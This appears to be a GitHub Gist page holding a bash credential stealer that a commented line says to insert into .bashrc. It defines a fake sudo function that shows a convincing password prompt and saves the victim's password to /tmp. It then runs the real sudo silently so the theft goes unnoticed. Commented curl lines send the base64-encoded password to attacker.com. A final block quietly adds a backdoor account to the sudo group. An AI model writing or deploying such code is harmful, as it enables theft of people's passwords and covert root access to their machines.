Last active
January 19, 2020 21:09
-
-
Save a2gs/5388951539154def8cd5fefe25b0dde5 to your computer and use it in GitHub Desktop.
A fake sudo prompt ('leech' collector)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://null-byte.wonderhowto.com/how-to/steal-ubuntu-macos-sudo-passwords-without-any-cracking-0194190/ | |
# Insert into .bashrc | |
function sudo () { | |
# A "realsudo" variable is created. It calls the `which` command to locate | |
# the path to the real sudo binary. This is used later in the function to | |
# execute the target's desired command. | |
realsudo="$(which sudo)" | |
# The `read` command will prompt (`-p`) the target with a convincing password | |
# request. The `-s` argument hides the input password, just as the real | |
# sudo command would. The target password is then set in the "inputPasswd" | |
# variable. | |
read -s -p "[sudo] password for $USER: " inputPasswd | |
# There are two `printf` commands here, separated by a semicolon. | |
# The first simply prints a new line in the terminal, as the real sudo | |
# does. The second writes the target's username and password to a | |
# file called "hackedPasswd.txt" in the /tmp directory. | |
printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt | |
# As an alternative to writing the password to the /tmp directory, | |
# it can be exfiltrated to the attacker's server. Uncomment the below | |
# "encoded" and "curl" lines to enable this function. The password | |
# is encoded with `base64` to make it easier to transmit in the URL. | |
# encoded=$(printf '%s' "$inputPasswd" | base64) >/dev/null 2>&1 | |
# curl -s "http://attacker.com/$USER:$encoded" >/dev/null 2>&1 | |
# The `-S` option allows users to input their sudo password using the command | |
# line. This is used to run an arbitrary `exit` command (`-c`) as the root | |
# user (`-u`) to unlock the sudo timeout function. This command and its | |
# output are hidden (/dev/null) from the target. It's only here to allow | |
# sudo usage for future commands. | |
# For more on sudo timeouts and /dev/null, see: | |
# https://itsfoss.com/change-sudo-password-timeout-ubuntu/ | |
# https://stackoverflow.com/questions/10508843/what-is-dev-null-21 | |
$realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1 | |
# With the sudo timeout engaged, privileged commands can be run without | |
# prompting the user for a password. This line will execute the target's | |
# desired command. | |
$realsudo "${@:1}" | |
} | |
########################################## | |
### Creating newuser (NEWUSERLOGIN / NEWPASSWORD) | |
sudo adduser --quiet --force-badname --gecos "" --ingroup sudo NEWUSERLOGIN 2>/dev/null 1>&2 <<EOF | |
NEWPASSWORD | |
NEWPASSWORD | |
EOF |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment